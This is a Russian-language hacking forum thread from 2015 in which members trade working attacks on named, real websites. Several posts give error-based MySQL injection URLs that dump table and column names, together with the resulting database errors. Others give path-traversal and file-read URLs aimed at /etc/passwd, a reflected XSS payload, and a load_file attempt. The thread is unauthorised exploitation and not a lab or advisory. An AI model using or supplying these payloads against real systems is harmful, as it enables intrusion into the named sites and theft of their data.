Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    На кавычку вроде реагирует, но не знаю, считается ли это SQL-Инъекцией
    Code:
    www.chromecrm.com/wyniki-wyszukiwania/?id=109&asId=as0'
     
  2. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    select user() показывает что я dbauser@server.
    в load_file('/etc/hosts') указывается строка: "209.200.x.x server server.site.com"
    сам сайт находится на ип 209.200.x.x. реальный путь раскрыл, но файлы не читает.
    Что в данном случае показывает запись в хостсе? не логично ли что я нахожусь на нужной машине и все должно читаться?
     
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    по моему нету
     
    frank likes this.
  4. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Code:
    http://www.coreknowledge.org/m'
    Помогите раскрутить
     
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    GET /m'|(select*from(select+name_const(version(),1),name_const(version(),1))a)='1

    однако name_const здесь не сработает, нужен другой вектор. сейчас посмотрю

    UPD:
    GET /m'||1%20group%20by%20concat((select%20table_name%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))having%20min(0)='1

    SQL: select * from mimik_Menus where lookup_code = 'm'||1 group by concat((select table_name from information_schema.tables limit 0,1),floor(rand(0)*2))having min(0)='1'<br/><br/>MySQL_ERROR: Duplicate entry 'CHARACTER_SETS1' for key 1
     
    _________________________
    #85 yarbabin, 18 May 2015
    Last edited: 18 May 2015
    frank likes this.
  6. huntercs16

    huntercs16 Member

    Joined:
    7 Oct 2013
    Messages:
    154
    Likes Received:
    15
    Reputations:
    6
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://astrodaily.ru/statya.php?s=lol/../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
     
    _________________________
    BigBear likes this.
  8. frank

    frank Member

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    96
    Reputations:
    28
    В догонку к тому что faza02 написал

    HTML:
    http://www.coreknowledge.org/mimik/mimik_live_data/view.php?id=194&sp_id=4&type=%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E&q=search
    поиск.. id=194 строго, все что отличается от этого скул ошибка и

    SQL: SELECT 1 FROM Fields WHERE type='Group Permission' AND table_id=

    MySQL_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

    параметh sp_id, если оставить пустым - ошибка
    SQL: select name from mimik_Standalone_Pages where id =

    MySQL_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

    Скорее всего тоже можно раскрутить по образу как faza02 написал... параметр type не фильтруется, что в примере выше и показал, ксс отраженная проходит на ура.
     
    Br@!ns likes this.
  9. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    я ж скинул вектор, что не так? там все нормально крутится и не сложно
    Code:
    http://www.coreknowledge.org/m%27||1%20group%20by%20concat%28%28select%20table_name%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29having%20min%280%29=%271
     
    _________________________
    Br@!ns likes this.
  11. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Тут можно что нибудь сделать?
    Code:
    http://www.woodworkersworkshop.com/resources/index.php?search=asfasfasf
     
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.woodworkersworkshop.com/resources/index.php?search=%27)|updatexml(1,repeat(version(),2),1)%23
     
    _________________________
    BigBear and Br@!ns like this.
  13. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    Другие команды чтения и записи выдают, что у пользователя не достаточно прав
     
  14. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Code:
    http://www.svetodom.ru/brand/1%27%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%28Table_name%29%29%20from%20information_schema.tables%20limit%20100,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1--+/
    до таблиц добрался, как дальше выбрать таблицу и узнать столбцы, и узнать информацию в столбцах?
     
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    select column_name from information_schema.columns where table_name = TABLE

    Code:
    http://www.svetodom.ru/brand/1+and(extractvalue(1,concat(0x3a,(select(column_name)from+information_schema.columns+where+table_name=0x444f434c495354+limit+0,1))))=1/
     
    _________________________
    teh likes this.
  16. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Ну вообще вроди как права на чтения и ненужны, при той команде что я написал выше.
    Code:
    https://rdot.org/forum/showthread.php?t=741
     
    truelamer likes this.
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    не думали, что mysql просто сконфигурирован корректно?
     
    _________________________
  18. huntercs16

    huntercs16 Member

    Joined:
    7 Oct 2013
    Messages:
    154
    Likes Received:
    15
    Reputations:
    6
    #98 huntercs16, 20 May 2015
    Last edited: 20 May 2015
  19. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    там фильтр на etc. но в другом скрипте нет:
    Code:
    http://sartraccc.ru/print.php?print_file=/etc/passwd
     
    _________________________
  20. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    ЛОГИНЫ ПАРОЛИ В ОТКРЫТОМ ВИДЕ ЗДЕСЬ НЕ ПОСТИМ
     
    _________________________